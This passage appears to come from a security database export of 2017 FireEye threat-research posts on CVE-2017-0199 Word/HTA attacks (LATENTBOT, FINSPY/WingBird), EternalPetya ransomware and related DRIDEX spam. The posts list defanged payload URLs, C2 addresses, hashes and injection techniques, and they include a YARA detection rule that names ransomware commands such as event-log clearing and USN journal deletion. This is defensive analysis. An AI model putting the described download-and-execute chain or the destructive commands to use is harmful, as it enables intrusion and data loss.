Additional details of the updates to this malware follow the Document 2 walkthrough.\n\n| MD5 | Size | Name | Description |\n|---|---|---|---|\n| 5ebfd13250dd0408e3de594e419f9e01 | 37,523 | hire_form.doc | Malicious document |\n| fb475f0d8c8e9bf1bc360211179d8a28 | 27,429 | template.doc/template[?].hta | Malicious HTA file |\n| 984658e34e634d56423797858a711846 | 5,704 | ww.vbs/maintenance.vbs | Stage two VBScript |\n| 73bf8647920eacc7cc377b3602a7ee7a | 13,386 | questions.doc/document.doc | Decoy document |\n| 11fb87888bbb4dcea4891ab856ac1c52 | 5,292 | eoobvfwiglhiliqougukgm.js | Malicious script |\n| a1faa23a3ef8cef372f5f74aed82d2de | 388,096 | wood.exe/dcihprianeeyirdeuceulx.exe | Final payload |\n| 15e51cdbd938545c9af47806984b1667 | 414,720 | wood.exe/dcihprianeeyirdeuceulx.exe | Updated final payload |\n\nTable 1: First document file metadata\n\n#### The LATENTBOT Payload\n\nThe payload associated with the first document is an updated version of the [LATENTBOT malware family](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). LATENTBOT is a highly-obfuscated BOT that has been in the wild since 2013.\n\nThe newer version of the LATENTBOT has different injection mechanisms for Windows XP (x86) and Windows 7 operating systems:\n\n * **Attrib.exe patching** \u2013 The bot calls Attrib.exe, patches the entry in memory, and inserts a JMP instruction to transfer control to the mapped section. 
To map the section in the address space of attrib.exe it uses ZwMapViewOfSection().\n * **Svchost code Injection** \u2013 Attrib.exe starts the svchost.exe process in suspended mode, creates space, and allocates code by calling ZwMapViewOfSection().\n * **Control transfer** \u2013 It then uses SetThreadContext() to modify the OEP of the primary thread, which will be executed in the remote process to trigger code execution.\n * **Browser injection** \u2013 A similar process is used to inject the final payload into the default web browser with the help of NtMapViewOfSection().\n\nIn Windows 7 or later operating systems, the bot does not use attrib.exe. Rather, it injects code into svchost.exe followed by launching the default browser with malicious payload by leveraging NtMapViewOfSection().\n\nThis variant then connects to the following command and control (C2) server:\n\n\n\nUpon successful communication with the C2 server, LATENTBOT generates a beacon. One of the decrypted beacons is as follows, with an updated version number of 5015:\n\n\n\nAt the time of analysis, the C2 server was offline. The bot comes with a highly modular plugin architecture and has been associated with the \u201cPony\u201d campaigns as an infostealer.\n\nAs of April 10, 2017, the malware hosted at www.modani[.]com/media/wysiwyg/wood.exe has been updated and the C2 server has been moved to: 217.12.203[.]100.\n\n#### Document 2 - (MD5: C10DABB05A38EDD8A9A0DDDA1C9AF10E)\n\nThe second malicious document identified by FireEye consisted of two malicious stages. The initial stage reached out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//95.141.38[.]110/mo/dnr/tmp/template.doc\n\nThis file is downloaded into the user\u2019s temporary internet files directory with the name template[?].hta, where [?] is determined at runtime. Once downloaded, winword.exe utilizes mshta.exe to parse the file. 
mshta.exe parses through the file, finding <script> </script> tags, and executes the contained script. Figure 6 shows the deobfuscated script.\n\n\n\nFigure 6: Second document, first stage VBScript\n\nFigure 6 shows the following malicious actions:\n\n 1. Terminate the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1\n 2. Download an executable from http[:]//95.141.38[.]110/mo/dnr/copy.jpg, saving it to '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 3. Download a document from http[:]//95.141.38[.]110/mo/dnr/docu.doc, saving it to %temp%\\document.doc\n 4. Clean up the Word Resiliency keys for Word versions 15.0 and 16.0, so that Microsoft Word will restart normally\n 5. Execute the malicious payload at '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 6. Open the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nExamination of the malicious payload revealed that it is a variant of the dropper for what Microsoft calls [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), which has characteristics similar to FinFisher. The malware is heavily obfuscated with several anti-analysis measures, including a custom VM to slow analysis. A [blog post by \"Artem\"](<https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html>) covers a payload driver of WingBird. 
The blog author briefly mentions the protection techniques of the dropper, which match this sample.\n\n| MD5 | Size | Name | Description |\n|---|---|---|---|\n| c10dabb05a38edd8a9a0ddda1c9af10e | 70,269 | \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc | Malicious document |\n| 9dec125f006f787a3f8ad464d480eed1 | 27,500 | template.doc | Malicious HTA file |\n| acde6fb59ed431000107c8e8ca1b7266 | 1,312,768 | copy.jpg/winword.exe | Final payload |\n| e01982913fbc22188b83f5f9fadc1c17 | 6,220,783 | docu.doc/document.doc | Decoy document |\n\nTable 2: Second document metadata\n\n#### Conclusion\n\nFireEye observed CVE-2017-0199, a vulnerability in Microsoft Word that allows an attacker to execute a malicious Visual Basic script. The CVE-2017-0199 vulnerability is a logic bug and bypasses most mitigations. Upon execution of the malicious script, it downloads and executes malicious payloads, as well as displays decoy documents to the user. The two documents achieve execution of their malicious payloads, with one containing LATENTBOT and the other containing WingBird/FinFisher. The malicious document contained only a link to the attacker-controlled server, showing the advantage of FireEye\u2019s MVX engine to detect multi-stage attacks. Further campaigns leveraging this attack have been observed prior to patch availability, but are not covered in this blog.\n\nWe recommend that Microsoft Office users apply the [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) as soon as possible.\n\n#### Acknowledgement\n\nThank you to Michael Matonis, Dhanesh Kizhakkinan, Yogesh Londhe, Swapnil Patil, Joshua Triplett, and Tyler Dean from FLARE Team, FireEye Labs Team, and FireEye iSIGHT Intelligence for their contributions to this blog. 
Thank you as well to everyone who worked with us at the Microsoft Security Response Center (MSRC).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-11T13:30:00", "type": "fireeye", "title": "CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-11T13:30:00", "id": "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", 
"description": "_UPDATE (July 21): FireEye continues to track this threat. An earlier version of this post has been updated to reflect new findings._\n\nOn June 27, 2017, multiple organizations \u2013 many in Europe \u2013 reported [significant disruptions](<https://www.theguardian.com/world/2017/jun/27/petya-ransomware-attack-strikes-companies-across-europe>) they are attributing to a variant of the Petya ransomware, which we are calling \u201cEternalPetya\u201d. The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits, including the [EternalBlue exploit](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) used in the [WannaCry](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>) attack from May 2017.\n\nThe initial infection vector for this campaign was a [poisoned update for the MeDoc software suite](<http://www.zdnet.com/article/six-quick-facts-june-global-ransomware-cyberattack/>), a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website had displayed a warning message in Russian stating: \"On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!\"\n\nOur analysis of the artifacts and network traffic at victim networks indicate that modified versions of the EternalBlue and EternalRomance SMB exploits were used, at least in part, to spread laterally. 
However, much of the propagation is believed to have occurred by the malware\u2019s use of WMI commands, MimiKatz, and PSExec.\n\nFireEye has confirmed the following two samples related to this attack:\n\n * 71b6a493388e7d0b40c83ce903bc6b04\n * e285b6ce047015943e685e6638bd837e\n\nFireEye mobilized a Community Protection Event to investigate the threat activity and protect customer environments.\n\nWhile FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.\n\nrule CPE_MS17_010_RANSOMWARE { \nmeta:version=\"1.1\" \n//filetype=\"PE\" \nauthor=\"[Ian.Ahl@fireeye.com](<mailto:Ian.Ahl@fireeye.com>) @TekDefense, [Nicholas.Carr@mandiant.com](<mailto:Nicholas.Carr@mandiant.com>) @ItsReallyNick\" \ndate=\"2017-06-27\" \ndescription=\"Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec\" \nstrings: \n// DRIVE USAGE \n$dmap01 = \"\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive\" nocase ascii wide \n$dmap02 = \"\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0\" nocase ascii wide \n$dmap03 = \"\\\\\\\\\\\\\\\\.\\\\\\C:\" nocase ascii wide \n$dmap04 = \"TERMSRV\" nocase ascii wide \n$dmap05 = \"\\\\\\admin$\" nocase ascii wide \n$dmap06 = \"GetLogicalDrives\" nocase ascii wide \n$dmap07 = \"GetDriveTypeW\" nocase ascii wide\n\n// RANSOMNOTE \n$msg01 = \"WARNING: DO NOT TURN OFF YOUR PC!\" nocase ascii wide \n$msg02 = \"IF YOU ABORT THIS PROCESS\" nocase ascii wide \n$msg03 = \"DESTROY ALL OF YOUR DATA!\" nocase ascii wide \n$msg04 = \"PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED\" nocase ascii wide \n$msg05 = \"your 
important files are encrypted\" ascii wide \n$msg06 = \"Your personal installation key\" nocase ascii wide \n$msg07 = \"worth of Bitcoin to following address\" nocase ascii wide \n$msg08 = \"CHKDSK is repairing sector\" nocase ascii wide \n$msg09 = \"Repairing file system on \" nocase ascii wide \n$msg10 = \"Bitcoin wallet ID\" nocase ascii wide \n$msg11 = \"[wowsmith123456@posteo.net](<mailto:wowsmith123456@posteo.net>)\" nocase ascii wide \n$msg12 = \"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\" nocase ascii wide \n$msg_pcre = /(en|de)crypt(ion|ed\\\\.)/ \n\n// FUNCTIONALITY, APIS \n$functions01 = \"need dictionary\" nocase ascii wide \n$functions02 = \"comspec\" nocase ascii wide \n$functions03 = \"OpenProcessToken\" nocase ascii wide \n$functions04 = \"CloseHandle\" nocase ascii wide \n$functions05 = \"EnterCriticalSection\" nocase ascii wide \n$functions06 = \"ExitProcess\" nocase ascii wide \n$functions07 = \"GetCurrentProcess\" nocase ascii wide \n$functions08 = \"GetProcAddress\" nocase ascii wide \n$functions09 = \"LeaveCriticalSection\" nocase ascii wide \n$functions10 = \"MultiByteToWideChar\" nocase ascii wide \n$functions11 = \"WideCharToMultiByte\" nocase ascii wide \n$functions12 = \"WriteFile\" nocase ascii wide \n$functions13 = \"CoTaskMemFree\" nocase ascii wide \n$functions14 = \"NamedPipe\" nocase ascii wide \n$functions15 = \"Sleep\" nocase ascii wide // imported, not in strings \n\n// COMMANDS \n// -- Clearing event logs & USNJrnl \n$cmd01 = \"wevtutil cl Setup\" ascii wide nocase \n$cmd02 = \"wevtutil cl System\" ascii wide nocase \n$cmd03 = \"wevtutil cl Security\" ascii wide nocase \n$cmd04 = \"wevtutil cl Application\" ascii wide nocase \n$cmd05 = \"fsutil usn deletejournal\" ascii wide nocase \n// -- Scheduled task \n$cmd06 = \"schtasks \" nocase ascii wide \n$cmd07 = \"/Create /SC \" nocase ascii wide \n$cmd08 = \" /TN \" nocase ascii wide \n$cmd09 = \"at %02d:%02d %ws\" nocase ascii wide \n$cmd10 = \"shutdown.exe /r /f\" nocase ascii wide \n// 
-- Sysinternals/PsExec and WMIC \n$cmd11 = \"-accepteula -s\" nocase ascii wide \n$cmd12 = \"wmic\" \n$cmd13 = \"/node:\" nocase ascii wide \n$cmd14 = \"process call create\" nocase ascii wide\n\ncondition: \n// (uint16(0) == 0x5A4D) \n3 of ($dmap*) \nand 2 of ($msg*) \nand 9 of ($functions*) \nand 7 of ($cmd*) \n} \n \n--- \n \nFireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.\n\n#### Implications\n\nThis activity highlights the importance of organizations securing their systems against SMB exploits and ransomware infections. [Microsoft has provided a guide](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. 
A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-27T17:30:00", "type": "fireeye", "title": "Petya Destructive Malware Variant Spreading via Stolen Credentials and EternalBlue Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-06-27T17:30:00", "id": "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "href": "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "FireEye recently identified a vulnerability \u2013 CVE-2017-0199 \u2013 that allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a Microsoft Office RTF document containing an embedded exploit. 
We worked with Microsoft and [published the technical details of this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) as soon as a patch was made available.\n\nIn this follow-up post, we discuss some of the campaigns we observed leveraging the CVE-2017-0199 zero-day in the days, weeks and months leading up to the patch being released.\n\n#### CVE-2017-0199 Used by Multiple Actors\n\nFireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure. Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.\n\n#### FINSPY Malware Used to Target Russian-Speaking Victims\n\nAs early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the \"Donetsk People's Republic\" exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.\n\nThe malicious document, \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the \u201cDonetsk People's Republic,\u201d the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.\n\nThe initial malicious document downloaded further payloads, including malware and a decoy document from 95.141.38.110. 
This site was open indexed to allow recovery of additional lure content, including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which claims to be a Russian Ministry of Defense decree approving a forest management plan.\n\nPer a 2015 [report](<https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/>) from CitizenLab, Gamma Group licenses their software to clients and each client uses unique infrastructure, making it likely that the two documents are being used by a single client.\n\nFINSPY malware is sold by Gamma Group, an Anglo-German \u201clawful intercept\u201d company. Gamma Group works on behalf of numerous nation-state clients, limiting insight into the ultimate sponsor of the activity. The FINSPY malware was heavily obfuscated, preventing the extraction of command and control (C2) information.\n\n\n\nFigure 1: FINSPY Lure Purporting to be Russian Military Manual\n\n#### CVE-2017-0199 Used to Distribute LATENTBOT\n\nAs early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the [LATENTBOT malware](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.\n\nLATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015. It is capable of a variety of functions, including credential theft, hard drive and data wiping, disabling security software, and remote desktop functionality. Recently, we observed LATENTBOT campaigns using Microsoft Word Intruder (MWI).\n\nThe lure documents distributing LATENTBOT malware used generic social engineering. 
The documents that were used are shown in Table 1, and all used 217.12.203.90 as a C2 domain.\n\n| **File Name** | **MD5 Hash** |\n|---|---|\n| hire_form.doc | 5ebfd13250dd0408e3de594e419f9e01 |\n| !!!!URGENT!!!!READ!!!.doc | 1b17ccf5109a9342b59bded31e1ffb18, 6e9483edacdc2b6f6ed45c526cf4cf7b |\n| PDP.doc | 4a81b6ac8aa0f86719a574d7546d563f |\n| document.doc | 65a558e9fe907dc5790e8a592364f64e |\n\nTable 1: LATENTBOT Documents\n\nOn April 10, the actors altered their infrastructure to deliver TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5: e3b600a59eea9b2ea7a0d4e3c45074da) beacons to http://185.77.129.103/SBz1efFx/gt45gh.php, then downloads a Tor client and beacons to sudoofk3wgl2gmxm.onion.\n\n#### FINSPY and LATENTBOT Samples Share Origin\n\nShared artifacts in the FINSPY and LATENTBOT samples suggest the same builder was used to create both, indicating the zero-day exploit was supplied to both criminal and cyber espionage operations from the same source.\n\nMalicious documents used in both campaigns share a last revision time of: 2016-11-27 22:42:00 (Figure 2).\n\n\n\nFigure 2: Revision Time Artifact Shared Between FINSPY and LATENTBOT Samples\n\n#### DRIDEX Spam Follows Recent Disclosure\n\nFollowing a disclosure of specifics related to the zero-day on April 7, 2017, the vulnerability was used in DRIDEX spam campaigns, which continue as of the publication of this blog. We cannot confirm the mechanism through which the actors obtained the exploit. These actors may have leveraged knowledge of the vulnerability gained through the disclosure, or been given access to it when it became clear that patching was imminent.\n\nA spam wave was sent out on April 10, 2017, leveraging a \u201cScan Data\u201d lure. 
The attached document leveraged CVE-2017-0199 to install DRIDEX on the victim\u2019s computer.\n\n#### Outlook and Implications\n\nThough only one FINSPY user has been observed leveraging this zero-day exploit, the historic scope of FINSPY, a capability used by several nation states, suggests other customers had access to it. Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-12T11:00:00", "type": "fireeye", "title": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware and LATENTBOT Cyber Crime Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-12T11:00:00", "id": "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2017-04-26T12:21:44", "description": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability. 
This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit. FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch by Microsoft to address the vulnerability, which can be found [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>).\n\nThe vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents. FireEye recommends that Microsoft Office users apply the [patch from Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>).\n\n#### Attack Scenario\n\nThe attack occurs in the following manner:\n\n 1. A threat actor emails a Microsoft Word document to a targeted user with an embedded OLE2 link object\n 2. When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious HTA file\n 3. The file returned by the server is a fake RTF file with an embedded malicious script\n 4. Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script\n\nIn the two documents that FireEye observed prior to the [initial blog](<https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html>) acknowledging these attacks, malicious scripts terminated the winword.exe processes, downloaded additional payloads, and loaded decoy documents. The original winword.exe process was terminated to conceal a user prompt generated by the OLE2link. 
Figure 1 shows this prompt.\n\n\n\nFigure 1: User prompt hidden by the Visual Basic script\n\n#### Document 1 - (MD5: 5ebfd13250dd0408e3de594e419f9e01)\n\nThe first malicious document identified by FireEye had three stages. An embedded OLE2 link object causes winword.exe to reach out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//46.102.152[.]129/template.doc\n\nOnce downloaded, the malicious HTA file is processed by the \u201capplication/hta\u201d handler. The highlighted line in Figure 2 shows the first download occurring, followed by the additional malicious payloads.\n\n\n\nFigure 2: Live attack scenario\n\nOnce downloaded, the template file was stored in the user\u2019s temporary internet files with the name template[?].hta, where [?] is determined at run time.\n\n#### The Logic Bug\n\nMshta.exe is responsible for handling the Content-Type \u201capplication/hta,\u201d parsing the content, and executing the script. Figure 3 shows winword.exe querying the registry value of the CLSID for the \u201capplication/hta\u201d handler.\n\n\n\nFigure 3: Winword query registry value\n\nWinword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe. Mshta.exe then executes the script embedded in the malicious HTA document. Figure 4 shows the deobfuscated VBScript from the first stage download.\n\n\n\nFigure 4: First document, stage one VBScript\n\nThe script shown in Figure 4 performs the following malicious actions:\n\n 1. Terminates the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1.\n 2. Downloads a VBScript file from http[:]//www.modani[.]com/media/wysiwyg/ww.vbs and saves it to %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 3. Downloads a decoy document from http[:]//www.modani[.]com/media/wysiwyg/questions.doc and saves it to %temp%\\document.doc\n 4. 
Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally\n 5. Executes the malicious stage two VBScript: %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 6. Opens the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nOnce executed, the downloaded stage two VBScript (ww.vbs/maintenance.vbs) performs the following actions:\n\n 1. Writes an embedded obfuscated script to %TMP%/eoobvfwiglhiliqougukgm.js\n 2. Executes the script\n\nThe obfuscated eoobvfwiglhiliqougukgm.js script performs the following actions when executed:\n\n 1. Attempts to delete itself from the system\n 2. Attempts to download http[:]//www.modani[.]com/media/wysiwyg/wood.exe (at most 44 times), and save the file to %TMP%\\dcihprianeeyirdeuceulx.exe\n 3. Executes %TMP%\\dcihprianeeyirdeuceulx.exe\n\nFigure 5 shows the process execution chain of events.\n\n\n\nFigure 5: Process creation events\n\nThe final payload utilized in this malware is a newer variant of the LATENTBOT malware family. 
Additional details of the updates to this malware follow the Document 2 walkthrough.\n\n| MD5 | Size | Name | Description |\n|---|---|---|---|\n| 5ebfd13250dd0408e3de594e419f9e01 | 37,523 | hire_form.doc | Malicious document |\n| fb475f0d8c8e9bf1bc360211179d8a28 | 27,429 | template.doc/template[?].hta | Malicious HTA file |\n| 984658e34e634d56423797858a711846 | 5,704 | ww.vbs/maintenance.vbs | Stage two VBScript |\n| 73bf8647920eacc7cc377b3602a7ee7a | 13,386 | questions.doc/document.doc | Decoy document |\n| 11fb87888bbb4dcea4891ab856ac1c52 | 5,292 | eoobvfwiglhiliqougukgm.js | Malicious script |\n| a1faa23a3ef8cef372f5f74aed82d2de | 388,096 | wood.exe/dcihprianeeyirdeuceulx.exe | Final payload |\n| 15e51cdbd938545c9af47806984b1667 | 414,720 | wood.exe/dcihprianeeyirdeuceulx.exe | Updated final payload |\n\nTable 1: First document file metadata\n\n#### The LATENTBOT Payload\n\nThe payload associated with the first document is an updated version of the [LATENTBOT malware family](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). LATENTBOT is a highly-obfuscated BOT that has been in the wild since 2013.\n\nThe newer version of the LATENTBOT has different injection mechanisms for Windows XP (x86) and Windows 7 operating systems:\n\n * **Attrib.exe patching** \u2013 The bot calls Attrib.exe, patches the entry in memory, and inserts a JMP instruction to transfer control to the mapped section. 
To map the section in the address space of attrib.exe it uses ZwMapViewOfSection().\n * **Svchost code Injection** \u2013 Attrib.exe starts the svchost.exe process in suspended mode, creates space, and allocates code by calling ZwMapViewOfSection().\n * **Control transfer** \u2013 It then uses SetThreadContext() to modify the OEP of the primary thread, which will be executed in the remote process to trigger code execution.\n * **Browser injection** \u2013 A similar process is used to inject the final payload into the default web browser with the help of NtMapViewOfSection().\n\nIn Windows 7 or later operating systems, the bot does not use attrib.exe. Rather, it injects code into svchost.exe followed by launching the default browser with the malicious payload by leveraging NtMapViewOfSection().\n\nThis variant then connects to the following command and control (C2) server:\n\n\n\nUpon successful communication with the C2 server, LATENTBOT generates a beacon. One of the decrypted beacons is as follows, with an updated version number of 5015:\n\n\n\nAt the time of analysis, the C2 server was offline. The bot comes with a highly modular plugin architecture and has been associated with the \u201cPony\u201d campaigns as an infostealer.\n\nAs of April 10, 2017, the malware hosted at www.modani[.]com/media/wysiwyg/wood.exe has been updated and the C2 server has been moved to: 217.12.203[.]100.\n\n#### Document 2 - (MD5: C10DABB05A38EDD8A9A0DDDA1C9AF10E)\n\nThe second malicious document identified by FireEye consisted of two malicious stages. The initial stage reached out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//95.141.38[.]110/mo/dnr/tmp/template.doc\n\nThis file is downloaded into the user\u2019s temporary internet files directory with the name template[?].hta, where [?] is determined at runtime. Once downloaded, winword.exe utilizes mshta.exe to parse the file. 
